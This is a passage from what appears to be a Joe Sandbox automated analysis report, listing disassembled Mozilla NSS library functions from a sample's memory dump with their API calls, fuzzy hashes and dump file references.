                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06aece33b92efe5bce789998aba5bfd907b613abccd069c93c813a0a627f7ffe
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54C161B7E502059FEB14CFF8D891BAAB7B4AF08714F140469E906A7361E739E900CB91
                                                                                                                                                                                                                                                            Function 6BEE2980 Relevance: 22.7, APIs: 15, Instructions: 217COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BEC9E71,?,?,6BEDF03D), ref: 6BEE29A2
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BEC9E71,?), ref: 6BEE29B6
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BEC9E71,?,?,6BEDF03D), ref: 6BEE29E2
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BEC9E71,?), ref: 6BEE29F6
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BEC9E71,?), ref: 6BEE2A06
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BEC9E71), ref: 6BEE2A13
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: TlsGetValue.KERNEL32 ref: 6BF6DD8C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BF6DDB4
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BEE2A6A
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEE2A98
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEE2AAC
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?), ref: 6BEE2ABC
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BEE2AC9
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEE2B3D
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEE2B51
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,6BEC9E71), ref: 6BEE2B61
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BEE2B6E
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalSection$EnterUnlock$HashLookupTable$calloc$Leave
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2204204336-0
                                                                                                                                                                                                                                                            • Opcode ID: 995d5f484dd0a762938e5be2c2a2b544a8a46bb8a1c9a6e8d5e5b4e23235afd5
                                                                                                                                                                                                                                                            • Instruction ID: a11f899a3d12e5e9675e4f5b2b0047662f6b71a5ec53c321d22e7785a41132e8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 995d5f484dd0a762938e5be2c2a2b544a8a46bb8a1c9a6e8d5e5b4e23235afd5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A71C576D002059BDB109F34DC4596ABB78EF15358F288568EC1C9B212FB35E962CBE1
                                                                                                                                                                                                                                                            Function 6BF13A00 Relevance: 22.7, APIs: 15, Instructions: 185COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PK11_GetAllTokens.NSS3(?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13A36
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13A55
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13A6E
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13A8D
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13ABB
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13AD8
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13B16
                                                                                                                                                                                                                                                            • PK11_GetNextSafe.NSS3 ref: 6BF13B40
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13B6F
                                                                                                                                                                                                                                                            • free.MOZGLUE ref: 6BF13BAC
                                                                                                                                                                                                                                                            • PR_SetError.NSS3 ref: 6BF13BC3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13BEA
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13C03
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13C24
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000,00000010,-00000001,?,6BF08A06,?), ref: 6BF13C42
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: UnlockValue$CriticalEnterSection$K11_free$ErrorNextSafeTokens
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3037946918-0
                                                                                                                                                                                                                                                            • Opcode ID: 80798453156465dea90be7ea5d82a44174db20093abcab08c7af651aebb82c9a
                                                                                                                                                                                                                                                            • Instruction ID: f0f8e5606b11a43d2890dc26d9d49fc229003b01f04e2769e1fcbe50664eddcf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80798453156465dea90be7ea5d82a44174db20093abcab08c7af651aebb82c9a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9712DB6908615DFDB10EF78C08565DFBF4BF49354F018969D889A7320EB38E884CB91
                                                                                                                                                                                                                                                            Function 6BFD4960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • malloc.MOZGLUE(00000004,?,6BFD8061,?,?,?,?), ref: 6BFD497D
                                                                                                                                                                                                                                                            • OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6BFD499E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,6BFD8061,?,?,?,?), ref: 6BFD49AC
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6BFD8061,?,?,?,?), ref: 6BFD49C2
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,?,6BFD8061,?,?,?,?), ref: 6BFD49D6
                                                                                                                                                                                                                                                            • CreateSemaphoreA.KERNEL32(00000000,6BFD8061,7FFFFFFF,?), ref: 6BFD4A19
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,6BFD8061,?,?,?,?), ref: 6BFD4A30
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6BFD8061,?,?,?,?), ref: 6BFD4A49
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6BFD8061,?,?,?,?), ref: 6BFD4A52
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,6BFD8061,?,?,?,?), ref: 6BFD4A5A
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,6BFD8061,?,?,?,?), ref: 6BFD4A6A
                                                                                                                                                                                                                                                            • CreateSemaphoreA.KERNEL32(?,6BFD8061,7FFFFFFF,?), ref: 6BFD4A9A
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6BFD8061,?,?,?,?), ref: 6BFD4AAE
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6BFD8061,?,?,?,?), ref: 6BFD4AC2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2092618053-0
                                                                                                                                                                                                                                                            • Opcode ID: ecadabd28c4c57db3d90c79f4a5ee1dce002f61fcb5e740cf4d9224459138d43
                                                                                                                                                                                                                                                            • Instruction ID: 5be692823992c976ca90268bfcc86a2ecf523fc804a4f089080fc1af2777d5c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecadabd28c4c57db3d90c79f4a5ee1dce002f61fcb5e740cf4d9224459138d43
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E41E776B002059BDF00AFF9DC8AB4AB7F8AB4A755F040034FD19E7650EB39D9148762
                                                                                                                                                                                                                                                            Function 6BFDC8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000020), ref: 6BFDC8B9
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BFDC8DA
                                                                                                                                                                                                                                                            • malloc.MOZGLUE(00000001), ref: 6BFDC8E4
                                                                                                                                                                                                                                                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BFDC8F8
                                                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6BFDC909
                                                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6BFDC918
                                                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6BFDC92A
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB0F00: PR_GetPageSize.NSS3(6BEB0936,FFFFE8AE,?,6BE416B7,00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BEB0F1B
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB0F00: PR_NewLogModule.NSS3(clock,6BEB0936,FFFFE8AE,?,6BE416B7,00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BEB0F25
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BFDC947
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2931242645-0
                                                                                                                                                                                                                                                            • Opcode ID: eb6991a3bce2f03dfd1aa9a96d5c7b06d9e7e382d9d937387410b5cc17fcfadb
                                                                                                                                                                                                                                                            • Instruction ID: 242c85f8b7696670f5b5742d7dcf7eaecd34341234d8b8b4d80784692c8c4482
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb6991a3bce2f03dfd1aa9a96d5c7b06d9e7e382d9d937387410b5cc17fcfadb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B21EBB2A007025BDB116FB89C0665B7BFCAF01358F080438E85AC2651EF39D514CBA2
                                                                                                                                                                                                                                                            Function 6BFDABB0 Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BFDABD5
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6BFDAC21
                                                                                                                                                                                                                                                              • Part of subcall function 6BF870F0: LeaveCriticalSection.KERNEL32(6BFD0C7B), ref: 6BF8710D
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BFDAC44
                                                                                                                                                                                                                                                            • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6BFDAC6E
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6BFDAC97
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BFDACBF
                                                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(?), ref: 6BFDACDB
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6BFDAD0D
                                                                                                                                                                                                                                                            • PR_SetPollableEvent.NSS3(?), ref: 6BFDAD18
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BFDAD31
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89890: TlsGetValue.KERNEL32(?,?,?,6BF897EB), ref: 6BF8989E
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6BFDAD89
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6BFDAD98
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6BFDADC5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$Enter$CondErrorEventLeavePollableValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 829741924-0
                                                                                                                                                                                                                                                            • Opcode ID: 9f3b8fd5e453ca5568ad2f535feeb091aa59a1fdee8ccb96b10df689ebb513d5
                                                                                                                                                                                                                                                            • Instruction ID: abca08f9e27670420923aa083877c9031606ee305cd8ea6f037162186d6592f8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f3b8fd5e453ca5568ad2f535feeb091aa59a1fdee8ccb96b10df689ebb513d5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D461AFB3900602DFC7209F24D885706B7F4AF44329F298969D95A5B772EB39FC84CB81
                                                                                                                                                                                                                                                            Function 6BF29A60 Relevance: 18.2, APIs: 12, Instructions: 238memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6BF29A9E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF214C0: TlsGetValue.KERNEL32 ref: 6BF214E0
                                                                                                                                                                                                                                                              • Part of subcall function 6BF214C0: EnterCriticalSection.KERNEL32 ref: 6BF214F5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF214C0: PR_Unlock.NSS3 ref: 6BF2150D
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6BF29AAC
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF29AFC
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(?,-00000004,?), ref: 6BF29B7B
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF29B8E
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF29BA5
                                                                                                                                                                                                                                                            • SEC_PKCS7DestroyContentInfo.NSS3(00000000), ref: 6BF29BBE
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BF29BD4
                                                                                                                                                                                                                                                            • PK11_GetInternalKeySlot.NSS3 ref: 6BF29C0E
                                                                                                                                                                                                                                                            • PK11_PBEKeyGen.NSS3(?,00000000,?,00000000,?), ref: 6BF29C38
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6BF29CDA
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000), ref: 6BF29D31
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$ErrorValue$ArenaItem_$CriticalEnterK11_SectionUnlockZfree$Alloc_AllocateContentCopyDestroyInfoInternalMark_Slot
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3381059483-0
                                                                                                                                                                                                                                                            • Opcode ID: d29b27ebaf55b9b204d9288460757f7ffb8a48f7ebba9b1b82d4e2d2ab917164
                                                                                                                                                                                                                                                            • Instruction ID: 03b8d24bea597b2096ef5908da33753dc8dff1c3f741e7acdeb9e070915e74f5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d29b27ebaf55b9b204d9288460757f7ffb8a48f7ebba9b1b82d4e2d2ab917164
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A081D2779042029BEB10CFA4DC51B5A77E4EF44308F508479ED499B2B2EB3DEA54CB92
                                                                                                                                                                                                                                                            Function 6BF279F0 Relevance: 18.2, APIs: 12, Instructions: 181memorystringthreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(000000AB,?,6BF2952D), ref: 6BF27A02
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BF208B4
                                                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?,?,?,6BF2952D), ref: 6BF27A36
                                                                                                                                                                                                                                                              • Part of subcall function 6BF207B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6BEC8298,?,?,?,6BEBFCE5,?), ref: 6BF207BF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF207B0: PL_HashTableLookup.NSS3(?,?), ref: 6BF207E6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BF2081B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BF20825
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,6BF2952D), ref: 6BF27A63
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6BF2952D), ref: 6BF27A7D
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,?,?,6BF2952D), ref: 6BF27A9C
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?), ref: 6BF27AEC
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000010), ref: 6BF27B04
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(?,?,00000000,?,?,?,?,?,?,6BF2952D), ref: 6BF27B3C
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,?,?,6BF2952D), ref: 6BF27B6B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,?,?,6BF2952D), ref: 6BF27B85
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,6BF2952D), ref: 6BF27BB1
